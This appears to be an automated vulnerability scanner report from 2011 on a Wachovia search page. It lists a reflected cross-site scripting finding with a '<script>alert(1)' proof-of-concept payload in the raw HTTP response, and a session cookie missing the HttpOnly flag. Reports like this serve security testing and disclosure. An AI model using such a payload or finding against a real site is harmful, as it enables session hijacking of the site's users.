1. Cross-site scripting (reflected)
2. Cookie without HttpOnly flag set
| Severity: | High |
| Confidence: | Certain |
| Host: | http://search.wachovia |
| Path: | /selfservice/microsites |
| GET /selfservice/microsites Host: search.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=0E2F343A1 Content-Type: text/html;charset=UTF-8 Date: Thu, 03 Feb 2011 13:17:41 GMT Connection: close <html> <head> <title>KNOVA Search Results </title> <meta http-equiv="content-type" content="text/html;c ...[SNIP]... <TextArea name="aaef9"><script>alert(1)< ...[SNIP]... |
| Severity: | Low |
| Confidence: | Firm |
| Host: | http://search.wachovia |
| Path: | /selfservice/microsites |
| GET /selfservice/microsites Host: search.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=030BBA540 Content-Type: text/html;charset=UTF-8 Date: Thu, 03 Feb 2011 13:17:30 GMT Connection: close <html> <head> <title>KNOVA Search Results </title> <meta http-equiv="content-type" content="text/html;c ...[SNIP]... |